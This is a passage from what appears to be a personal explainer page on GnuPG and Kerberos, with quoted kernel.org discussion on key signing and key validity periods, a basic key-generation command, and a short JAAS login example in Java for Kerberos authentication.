graphical GnuPG front-ends (Seahorse for GNOME, KGPG for KDE).
For Mac OS X, the Mac GPG project provides a number of Aqua
front-ends for OS integration of encryption and key management as
well as GnuPG installations via Installer packages. Furthermore, the
GPGTools Installer installs all related OpenPGP applications (GPG
Keychain Access), plugins (GPGMail) and dependencies (MacGPG) to
use GnuPG based encryption. Instant messaging applications such as
Psi and Fire can automatically secure messages when GnuPG is
installed and configured. Web-based software such as Horde also
makes use of it. The cross-platform plugin Enigmail provides GnuPG
support for Mozilla Thunderbird and SeaMonkey. Similarly, Enigform
provides GnuPG support for Mozilla Firefox. FireGPG was
discontinued June 7, 2010.

3. should i use it?
excerpt from the kernel discussion [1]
There is going to be discussion about security procedures at the kernel
summit; to date we've been focused on the short-term requirements to
get git.kernel.org back up so that the next merge window can open up,
hopefully without getting instantly compromised again. That's going to
require the help of everyone that we trust, especially from folks who
are maintaining git repositories.

I personally don't think we're headed into sign-all-patches, since
patches still need to be reviewed, and at some level, as long as the
patch is reviewed to be Good Stuff, that's actually the most important
thing.

That being said, if you have a GPG key, and you can participate in a
key signing exercise so that you are part of the web of trust, that also
means that you have a much better ability to trust that git trees that
you pull down to your system that have signed tags are in fact
legitimate (at least up to a signed tag).

So there are good reasons why developers who primarily participate
by e-mailing patches might want to start using GPG.

4. how long should the new key be valid?
excerpt from the kernel discussion [1]
That is a good question. At the very least you want it to be valid for
long enough that you will be able to get enough signatures on a new
key *before* your old key expires. As such I would recommend 3-5
years depending on how much you trust yourself to keep the key
secure.

Some people have decided to opt for an unlimited key, but that
*requires* that you have a way to revoke the old key, which is why we
are considering a key revocation escrow service.

5. what tools do i need to generate a gpg key?
well, you need gpg. To generate the key, run
$ gpg --gen-key
and follow the steps on screen.
you can read more information in [2]


[1] http://help.lockergnome.com/linux/kernel-org-status-establishing-PGP-web-trust--ftopict544109.html
[2] http://cryptnet.net/fdp/crypto/keysigning_party/en/keysigning_party.html#prep
[3] http://en.wikipedia.org/wiki/GNU_Privacy_Guard

kerberos

1. what is kerberos?

from wikipedia,

kerberos is a computer network authentication protocol which works on the basis of 'tickets' to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

okay... so what does it actually mean?
It means that in a network, a client computer authenticates to a server, and this process mutually proves the identity of the client and the server.

A 'ticket' is produced if the identity is authenticated and authorized. This ticket can be used by the client to access the computer resources that it is allowed to.
2. how does it really work?

Imagine two computers, server A and client B, connected together in a TCP network. Now client B needs to access a computer resource which requires authentication.

Server A provides the authentication service over the network. Client B authenticates itself to the Authentication Server (AS), and the username is forwarded to a Key Distribution Center (KDC).

The KDC issues a Ticket Granting Ticket (TGT), which is time stamped and encrypted using the user's password, and returns the TGT to the user's workstation.

If client B needs to communicate with another node (kerberos coins it a 'principal'), it sends the TGT to the Ticket Granting Service (TGS), which shares the same host as the KDC. If the TGT is verified as valid, the user is permitted to access the requested service on that node, and the TGS issues a ticket and session keys to the client.
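
On the Java side, this exchange is typically driven through JAAS. Below is a minimal sketch, assuming a working krb5.conf pointing at your KDC and a JAAS login configuration with an entry named KerberosClient backed by Krb5LoginModule; the entry name is my own choice for illustration:

// a minimal JAAS sketch; run the JVM with
// -Djava.security.auth.login.config=jaas.conf where jaas.conf contains an
// entry named "KerberosClient" (a hypothetical name) using
// com.sun.security.auth.module.Krb5LoginModule
import javax.security.auth.Subject;
import javax.security.auth.login.LoginContext;
import javax.security.auth.login.LoginException;

import com.sun.security.auth.callback.TextCallbackHandler;

public class KerberosLoginDemo
{
    public static void main(String[] args) throws LoginException
    {
        // prompts for the principal name and password, then requests a TGT
        // from the KDC configured in krb5.conf
        LoginContext lc = new LoginContext("KerberosClient",
                                           new TextCallbackHandler());
        lc.login();

        Subject subject = lc.getSubject();
        System.out.println("Authenticated: " + subject.getPrincipals());

        lc.logout();
    }
}

The matching jaas.conf entry would be along the lines of: KerberosClient { com.sun.security.auth.module.Krb5LoginModule required; };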

3. where is it used?
In a windows domain controller or in samba. Basically any service that supports kerberos authentication.

4. should i use it?
That depends on a few factors. For one, if you are the administrator of an organization which has many computer resources, you want to provide single sign on for the users. That is, once a user is authenticated, the user can access the resources it is allowed to. In this situation, it may sound logical to implement kerberos as the network authentication service.

5. any link for me to read further?
sure, i find the links below useful.
http://en.wikipedia.org/wiki/Kerberos_%28protocol%29
https://help.ubuntu.com/11.10/serverguide/kerberos.html
https://help.ubuntu.com/community/Kerberos
http://www.centos.org/docs/5/html/Deployment_Guide-en-US/ch-kerberos.html
http://www.centos.org/docs/5/html/CDS/ag/8.0/Introduction_to_SASL-Configuring_Kerberos.html
http://www.centos.org/docs/5/html/5.2/Deployment_Guide/s1-kerberos-clients.html